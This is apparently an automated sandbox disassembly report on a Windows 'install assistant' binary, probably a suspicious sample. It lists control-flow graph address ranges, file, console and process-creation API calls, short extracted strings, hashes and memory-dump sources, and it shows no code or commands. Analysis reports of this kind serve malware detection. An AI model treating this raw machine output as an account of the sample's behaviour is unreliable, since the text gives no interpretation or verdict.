                                                          control_flow_graph 6824 6c6acad3-6c6acae3 6825 6c6acafd-6c6acaff 6824->6825 6826 6c6acae5-6c6acaf8 call 6c69f9df call 6c69f9cc 6824->6826 6827 6c6ace64-6c6ace71 call 6c69f9df call 6c69f9cc 6825->6827 6828 6c6acb05-6c6acb0b 6825->6828 6840 6c6ace7c 6826->6840 6845 6c6ace77 call 6c6a0120 6827->6845 6828->6827 6831 6c6acb11-6c6acb37 6828->6831 6831->6827 6834 6c6acb3d-6c6acb46 6831->6834 6838 6c6acb48-6c6acb5b call 6c69f9df call 6c69f9cc 6834->6838 6839 6c6acb60-6c6acb62 6834->6839 6838->6845 6843 6c6acb68-6c6acb6b 6839->6843 6844 6c6ace60-6c6ace62 6839->6844 6846 6c6ace7f-6c6ace82 6840->6846 6843->6844 6848 6c6acb71-6c6acb75 6843->6848 6844->6846 6845->6840 6848->6838 6851 6c6acb77-6c6acb8e 6848->6851 6853 6c6acbdf-6c6acbe5 6851->6853 6854 6c6acb90-6c6acb93 6851->6854 6855 6c6acbab-6c6acbc2 call 6c69f9df call 6c69f9cc call 6c6a0120 6853->6855 6856 6c6acbe7-6c6acbf1 6853->6856 6857 6c6acba3-6c6acba9 6854->6857 6858 6c6acb95-6c6acb9e 6854->6858 6890 6c6acd97 6855->6890 6862 6c6acbf8-6c6acc16 call 6c6a47f5 call 6c6a47bb * 2 6856->6862 6863 6c6acbf3-6c6acbf5 6856->6863 6857->6855 6860 6c6acbc7-6c6acbda 6857->6860 6859 6c6acc63-6c6acc73 6858->6859 6865 6c6acd38-6c6acd41 call 6c6b19e5 6859->6865 6866 6c6acc79-6c6acc85 6859->6866 6860->6859 6894 6c6acc18-6c6acc2e call 6c69f9cc call 6c69f9df 6862->6894 6895 6c6acc33-6c6acc5c call 6c6aac69 6862->6895 6863->6862 6878 6c6acd43-6c6acd55 6865->6878 6879 6c6acdb4 6865->6879 6866->6865 6870 6c6acc8b-6c6acc8d 6866->6870 6870->6865 6874 6c6acc93-6c6accb7 6870->6874 6874->6865 6880 6c6accb9-6c6acccf 6874->6880 6878->6879 6885 6c6acd57-6c6acd66 GetConsoleMode 6878->6885 6883 6c6acdb8-6c6acdd0 ReadFile 6879->6883 6880->6865 6881 6c6accd1-6c6accd3 6880->6881 6881->6865 6886 6c6accd5-6c6accfb 6881->6886 6888 6c6ace2c-6c6ace37 GetLastError 6883->6888 6889 6c6acdd2-6c6acdd8 6883->6889 6885->6879 6891 6c6acd68-6c6acd6c 6885->6891 6886->6865 6893 6c6accfd-6c6acd13 6886->6893 6896 6c6ace39-6c6ace4b call 6c69f9cc call 6c69f9df 6888->6896 6897 6c6ace50-6c6ace53 6888->6897 6889->6888 6898 6c6acdda 6889->6898 6892 6c6acd9a-6c6acda4 call 6c6a47bb 6890->6892 6891->6883 6899 6c6acd6e-6c6acd88 ReadConsoleW 6891->6899 6892->6846 6893->6865 6901 6c6acd15-6c6acd17 6893->6901 6894->6890 6895->6859 6896->6890 6908 6c6ace59-6c6ace5b 6897->6908 6909 6c6acd90-6c6acd96 call 6c69f9f2 6897->6909 6905 6c6acddd-6c6acdef 6898->6905 6906 6c6acd8a GetLastError 6899->6906 6907 6c6acda9-6c6acdb2 6899->6907 6901->6865 6911 6c6acd19-6c6acd33 6901->6911 6905->6892 6915 6c6acdf1-6c6acdf5 6905->6915 6906->6909 6907->6905 6908->6892 6909->6890 6911->6865 6919 6c6ace0e-6c6ace19 6915->6919 6920 6c6acdf7-6c6ace07 call 6c6acefe 6915->6920 6922 6c6ace1b call 6c6ace83 6919->6922 6923 6c6ace25-6c6ace2a call 6c6ad1b6 6919->6923 6932 6c6ace0a-6c6ace0c 6920->6932 6930 6c6ace20-6c6ace23 6922->6930 6923->6930 6930->6932 6932->6892
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8Q
                                                          • API String ID: 0-4022487301
                                                          • Opcode ID: 4247e5974834ddf46d6844dbb905cbbca3f3f3d5b57187fe0ef2fdeb2ea23fc0
                                                          • Instruction ID: eb1cb6e0ef14edbc601f6c483c54c2c798a05e57b7dea41e4b45a539faad52ce
                                                          • Opcode Fuzzy Hash: 4247e5974834ddf46d6844dbb905cbbca3f3f3d5b57187fe0ef2fdeb2ea23fc0
                                                          • Instruction Fuzzy Hash: 4DC1B270A04259BBDF01EFD9C880BADBBB0BF4A318F104159E516ABB41C7729D47CB69

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6933 6c6b406c-6c6b409c call 6c6b44ec 6936 6c6b409e-6c6b40a9 call 6c69f9df 6933->6936 6937 6c6b40b7-6c6b40c3 call 6c6b160c 6933->6937 6942 6c6b40ab-6c6b40b2 call 6c69f9cc 6936->6942 6943 6c6b40dc-6c6b4125 call 6c6b4457 6937->6943 6944 6c6b40c5-6c6b40da call 6c69f9df call 6c69f9cc 6937->6944 6951 6c6b4391-6c6b4395 6942->6951 6953 6c6b4192-6c6b419b GetFileType 6943->6953 6954 6c6b4127-6c6b4130 6943->6954 6944->6942 6955 6c6b419d-6c6b41ce GetLastError call 6c69f9f2 CloseHandle 6953->6955 6956 6c6b41e4-6c6b41e7 6953->6956 6958 6c6b4132-6c6b4136 6954->6958 6959 6c6b4167-6c6b418d GetLastError call 6c69f9f2 6954->6959 6955->6942 6972 6c6b41d4-6c6b41df call 6c69f9cc 6955->6972 6963 6c6b41e9-6c6b41ee 6956->6963 6964 6c6b41f0-6c6b41f6 6956->6964 6958->6959 6960 6c6b4138-6c6b4165 call 6c6b4457 6958->6960 6959->6942 6960->6953 6960->6959 6965 6c6b41fa-6c6b4248 call 6c6b17b0 6963->6965 6964->6965 6966 6c6b41f8 6964->6966 6975 6c6b424a-6c6b4256 call 6c6b4666 6965->6975 6976 6c6b4267-6c6b428f call 6c6b4710 6965->6976 6966->6965 6972->6942 6975->6976 6982 6c6b4258 6975->6982 6983 6c6b4291-6c6b4292 6976->6983 6984 6c6b4294-6c6b42d5 6976->6984 6987 6c6b425a-6c6b4262 call 6c6ab925 6982->6987 6983->6987 6985 6c6b42d7-6c6b42db 6984->6985 6986 6c6b42f6-6c6b4304 6984->6986 6985->6986 6988 6c6b42dd-6c6b42f1 6985->6988 6989 6c6b430a-6c6b430e 6986->6989 6990 6c6b438f 6986->6990 6987->6951 6988->6986 6989->6990 6992 6c6b4310-6c6b4343 CloseHandle call 6c6b4457 6989->6992 6990->6951 6996 6c6b4377-6c6b438b 6992->6996 6997 6c6b4345-6c6b4371 GetLastError call 6c69f9f2 call 6c6b171f 6992->6997 6996->6990 6997->6996
                                                          APIs
                                                            • Part of subcall function 6C6B4457: CreateFileW.KERNEL32(00000000,00000000,?,6C6B4115,?,?,00000000,?,6C6B4115,00000000,0000000C), ref: 6C6B4474
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B4180
                                                          • __dosmaperr.LIBCMT ref: 6C6B4187
                                                          • GetFileType.KERNEL32(00000000), ref: 6C6B4193
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B419D
                                                          • __dosmaperr.LIBCMT ref: 6C6B41A6
                                                          • CloseHandle.KERNEL32(00000000), ref: 6C6B41C6
                                                          • CloseHandle.KERNEL32(6C6AB0D0), ref: 6C6B4313
                                                          • GetLastError.KERNEL32 ref: 6C6B4345
                                                          • __dosmaperr.LIBCMT ref: 6C6B434C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: 8Q
                                                          • API String ID: 4237864984-4022487301
                                                          • Opcode ID: 4b550a672b939727e72043f7dd5d5a1e780675054ad4ee0fc4974409a50e128a
                                                          • Instruction ID: eda345127fc5cb0b4a80c471db29791bf426666e553a28b730431bc7a2bdfea0
                                                          • Opcode Fuzzy Hash: 4b550a672b939727e72043f7dd5d5a1e780675054ad4ee0fc4974409a50e128a
                                                          • Instruction Fuzzy Hash: 38A14632A041559FCF08CF68D891BFE7BB0AF07328F180259E811BB791CBB58926C759

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7002 6c66c1e0-6c66c239 call 6c696b70 7005 6c66c260-6c66c269 7002->7005 7006 6c66c2b0-6c66c2b5 7005->7006 7007 6c66c26b-6c66c270 7005->7007 7008 6c66c2b7-6c66c2bc 7006->7008 7009 6c66c330-6c66c335 7006->7009 7010 6c66c272-6c66c277 7007->7010 7011 6c66c2f0-6c66c2f5 7007->7011 7014 6c66c407-6c66c41b 7008->7014 7015 6c66c2c2-6c66c2c7 7008->7015 7018 6c66c33b-6c66c340 7009->7018 7019 6c66c489-6c66c4b9 call 6c69b3a0 7009->7019 7012 6c66c372-6c66c3df WriteFile 7010->7012 7013 6c66c27d-6c66c282 7010->7013 7016 6c66c431-6c66c448 WriteFile 7011->7016 7017 6c66c2fb-6c66c300 7011->7017 7021 6c66c3e9-6c66c3fd WriteFile 7012->7021 7020 6c66c288-6c66c28d 7013->7020 7013->7021 7022 6c66c41f-6c66c42c 7014->7022 7023 6c66c2cd-6c66c2d2 7015->7023 7024 6c66c23b-6c66c250 7015->7024 7026 6c66c452-6c66c47f call 6c69b920 ReadFile 7016->7026 7025 6c66c306-6c66c30b 7017->7025 7017->7026 7028 6c66c346-6c66c36d 7018->7028 7029 6c66c4be-6c66c4c3 7018->7029 7019->7005 7020->7005 7030 6c66c28f-6c66c2aa 7020->7030 7021->7014 7022->7005 7023->7005 7031 6c66c2d4-6c66c2e7 7023->7031 7034 6c66c253-6c66c258 7024->7034 7025->7005 7033 6c66c311-6c66c32b 7025->7033 7026->7019 7028->7034 7029->7005 7036 6c66c4c9-6c66c4d7 7029->7036 7030->7034 7031->7034 7033->7022 7034->7005
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :uW$;uW$;uW$> 4!$> 4!
                                                          • API String ID: 0-4100612575
                                                          • Opcode ID: 54d08d8b60c38e6d08ffd2ade88279a3bf1a63a59584e6607bc051eaa69c7efd
                                                          • Instruction ID: 54df0bfbe7f26cc0e60224093cdf398ae5f5f9fdf7cdfe79864ab62ab13086cf
                                                          • Opcode Fuzzy Hash: 54d08d8b60c38e6d08ffd2ade88279a3bf1a63a59584e6607bc051eaa69c7efd
                                                          • Instruction Fuzzy Hash: 03717CB0208745AFDB10DF56C880B9ABBF4BF8A708F10492EF499D7A50D771D8489B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K?Jo$K?Jo$`Rlx$7eO
                                                          • API String ID: 0-174837320
                                                          • Opcode ID: 4c4d7ddd165121c55145b156e2e54366ee01a5807cb315236f66721cbd2481c7
                                                          • Instruction ID: 047fec6cd24db84cd07bc4c5900edcb7f0545b3c8ad512d700256ed1cd6d2665
                                                          • Opcode Fuzzy Hash: 4c4d7ddd165121c55145b156e2e54366ee01a5807cb315236f66721cbd2481c7
                                                          • Instruction Fuzzy Hash: BE4245B4609342DFCB54CF2AC090A5ABBE1AFC9314F24891EF5958BB20D634D845DF5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ;T55
                                                          • API String ID: 0-2572755013
                                                          • Opcode ID: 9c373c70a8837a996f9877b9ee99a80c0e32e1f716408ecfe2109c8f650d9259
                                                          • Instruction ID: f75319403e15c9a4a0ebddb82ad0dcaa3283c2febf804e03388418c92334b2da
                                                          • Opcode Fuzzy Hash: 9c373c70a8837a996f9877b9ee99a80c0e32e1f716408ecfe2109c8f650d9259
                                                          • Instruction Fuzzy Hash: B303D431645B018FC728CF28CCD0695B7E3AFD53287598F6DC0AA4BA95D778B44ACB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7579 6c694ff0-6c695077 CreateProcessA 7580 6c6950ca-6c6950d3 7579->7580 7581 6c6950f0-6c69510b 7580->7581 7582 6c6950d5-6c6950da 7580->7582 7581->7580 7583 6c6950dc-6c6950e1 7582->7583 7584 6c695080-6c6950c2 WaitForSingleObject CloseHandle * 2 7582->7584 7583->7580 7585 6c6950e3-6c695118 7583->7585 7584->7580
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: D
                                                          • API String ID: 963392458-2746444292
                                                          • Opcode ID: 39ad0b01810e3b4213fbc595adf2732b3a795c2ea0da1939dd78f5ead9eaa115
                                                          • Instruction ID: 93bec23deb3f8242f2e8c150456fc6a093fd09aa1ab2afa9c1a16883188dfb2c
                                                          • Opcode Fuzzy Hash: 39ad0b01810e3b4213fbc595adf2732b3a795c2ea0da1939dd78f5ead9eaa115
                                                          • Instruction Fuzzy Hash: BD3102708093818FD740DF28C19876EBBF0EB8A318F405A1DF8E986250E7759589CF47

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7587 6c6abc5e-6c6abc7a 7588 6c6abe39 7587->7588 7589 6c6abc80-6c6abc82 7587->7589 7590 6c6abe3b-6c6abe3f 7588->7590 7591 6c6abca4-6c6abcc5 7589->7591 7592 6c6abc84-6c6abc97 call 6c69f9df call 6c69f9cc call 6c6a0120 7589->7592 7594 6c6abccc-6c6abcd2 7591->7594 7595 6c6abcc7-6c6abcca 7591->7595 7609 6c6abc9c-6c6abc9f 7592->7609 7594->7592 7597 6c6abcd4-6c6abcd9 7594->7597 7595->7594 7595->7597 7598 6c6abcea-6c6abcfb call 6c6abe40 7597->7598 7599 6c6abcdb-6c6abce7 call 6c6aac69 7597->7599 7607 6c6abd3c-6c6abd4e 7598->7607 7608 6c6abcfd-6c6abcff 7598->7608 7599->7598 7610 6c6abd50-6c6abd59 7607->7610 7611 6c6abd95-6c6abdb7 WriteFile 7607->7611 7612 6c6abd01-6c6abd09 7608->7612 7613 6c6abd26-6c6abd32 call 6c6abeb1 7608->7613 7609->7590 7614 6c6abd5b-6c6abd5e 7610->7614 7615 6c6abd85-6c6abd93 call 6c6ac2c3 7610->7615 7618 6c6abdb9-6c6abdbf GetLastError 7611->7618 7619 6c6abdc2 7611->7619 7616 6c6abdcb-6c6abdce 7612->7616 7617 6c6abd0f-6c6abd1c call 6c6ac25b 7612->7617 7626 6c6abd37-6c6abd3a 7613->7626 7622 6c6abd60-6c6abd63 7614->7622 7623 6c6abd75-6c6abd83 call 6c6ac487 7614->7623 7615->7626 7621 6c6abdd1-6c6abdd6 7616->7621 7634 6c6abd1f-6c6abd21 7617->7634 7618->7619 7627 6c6abdc5-6c6abdca 7619->7627 7628 6c6abdd8-6c6abddd 7621->7628 7629 6c6abe34-6c6abe37 7621->7629 7622->7621 7630 6c6abd65-6c6abd73 call 6c6ac39e 7622->7630 7623->7626 7626->7634 7627->7616 7635 6c6abe09-6c6abe15 7628->7635 7636 6c6abddf-6c6abde4 7628->7636 7629->7590 7630->7626 7634->7627 7642 6c6abe1c-6c6abe2f call 6c69f9cc call 6c69f9df 7635->7642 7643 6c6abe17-6c6abe1a 7635->7643 7639 6c6abdfd-6c6abe04 call 6c69f9f2 7636->7639 7640 6c6abde6-6c6abdf8 call 6c69f9cc call 6c69f9df 7636->7640 7639->7609 7640->7609 7642->7609 7643->7588 7643->7642
                                                          APIs
                                                            • Part of subcall function 6C6ABEB1: GetConsoleCP.KERNEL32(?,6C6AB0D0,?), ref: 6C6ABEF9
                                                          • WriteFile.KERNEL32(?,?,6C6B46EC,00000000,00000000,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC,00000000), ref: 6C6ABDAF
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C6B46EC,6C6AB0D0,00000000,?,?,?,?,00000000,?), ref: 6C6ABDB9
                                                          • __dosmaperr.LIBCMT ref: 6C6ABDFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 251514795-4022487301
                                                          • Opcode ID: 0cd68032b707fa77b813e10cefa7ad283d3969a4e01870fd6c37e7591b491c8c
                                                          • Instruction ID: 75396f9525a2b020312076944d7ecbdb06e8d8cdf0bf7862d7c826a4814afba3
                                                          • Opcode Fuzzy Hash: 0cd68032b707fa77b813e10cefa7ad283d3969a4e01870fd6c37e7591b491c8c
                                                          • Instruction Fuzzy Hash: E851C171A0420EBFDB019FE8C880FEEBBB9EF86358F140551E500ABA51D7719D4787A9

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7654 6c695b90-6c695b9c 7655 6c695bdd 7654->7655 7656 6c695b9e-6c695ba9 7654->7656 7657 6c695bdf-6c695c57 7655->7657 7658 6c695bab-6c695bbd 7656->7658 7659 6c695bbf-6c695bcc call 6c5601f0 call 6c6a0b18 7656->7659 7660 6c695c59-6c695c81 7657->7660 7661 6c695c83-6c695c89 7657->7661 7658->7659 7668 6c695bd1-6c695bdb 7659->7668 7660->7661 7663 6c695c8a-6c695d49 call 6c562250 call 6c562340 call 6c699379 call 6c55e010 call 6c697088 7660->7663 7668->7657
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C695D31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 323602529-1866435925
                                                          • Opcode ID: b841409b7fb9e8372c5b90ea066634f9d69662c615ef572ab4aa007662a874cb
                                                          • Instruction ID: 96adc159ae3a44071592d7e9fcf3438d7fb26128073375937666a34f7ebf538c
                                                          • Opcode Fuzzy Hash: b841409b7fb9e8372c5b90ea066634f9d69662c615ef572ab4aa007662a874cb
                                                          • Instruction Fuzzy Hash: BE5134B5A00B008FD725CF29C895B97BBF1FB89318F408A2DD89647B90D775B909CB94

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7699 6c6ab925-6c6ab939 call 6c6b15a2 7702 6c6ab93b-6c6ab93d 7699->7702 7703 6c6ab93f-6c6ab947 7699->7703 7706 6c6ab98d-6c6ab9ad call 6c6b171f 7702->7706 7704 6c6ab949-6c6ab950 7703->7704 7705 6c6ab952-6c6ab955 7703->7705 7704->7705 7709 6c6ab95d-6c6ab971 call 6c6b15a2 * 2 7704->7709 7707 6c6ab973-6c6ab983 call 6c6b15a2 CloseHandle 7705->7707 7708 6c6ab957-6c6ab95b 7705->7708 7714 6c6ab9bb 7706->7714 7715 6c6ab9af-6c6ab9b9 call 6c69f9f2 7706->7715 7707->7702 7721 6c6ab985-6c6ab98b GetLastError 7707->7721 7708->7707 7708->7709 7709->7702 7709->7707 7719 6c6ab9bd-6c6ab9c0 7714->7719 7715->7719 7721->7706
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6C6B425F), ref: 6C6AB97B
                                                          • GetLastError.KERNEL32(?,00000000,?,6C6B425F), ref: 6C6AB985
                                                          • __dosmaperr.LIBCMT ref: 6C6AB9B0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2583163307-0
                                                          • Opcode ID: 1843ed7c4d38ef84aa2b5b85c81b8fedc2c14d7b4fa9c87b3cf72b1a02d7f7b1
                                                          • Instruction ID: 2d5f1ed526275f37999687bbc99facf8f95c778b0247f906469ec0163bb0dbad
                                                          • Opcode Fuzzy Hash: 1843ed7c4d38ef84aa2b5b85c81b8fedc2c14d7b4fa9c87b3cf72b1a02d7f7b1
                                                          • Instruction Fuzzy Hash: 0B014E33A5912C2AC20006BA94457AD77694FC373CF29036DE81997AC1DF71CC9B839C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7944 6c6a0b9c-6c6a0ba7 7945 6c6a0ba9-6c6a0bbc call 6c69f9cc call 6c6a0120 7944->7945 7946 6c6a0bbe-6c6a0bcb 7944->7946 7957 6c6a0c10-6c6a0c12 7945->7957 7947 6c6a0bcd-6c6a0be2 call 6c6a0cb9 call 6c6a873e call 6c6a9c60 call 6c6ab898 7946->7947 7948 6c6a0c06-6c6a0c0f call 6c6aae75 7946->7948 7963 6c6a0be7-6c6a0bec 7947->7963 7948->7957 7964 6c6a0bee-6c6a0bf1 7963->7964 7965 6c6a0bf3-6c6a0bf7 7963->7965 7964->7948 7965->7948 7966 6c6a0bf9-6c6a0c05 call 6c6a47bb 7965->7966 7966->7948
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
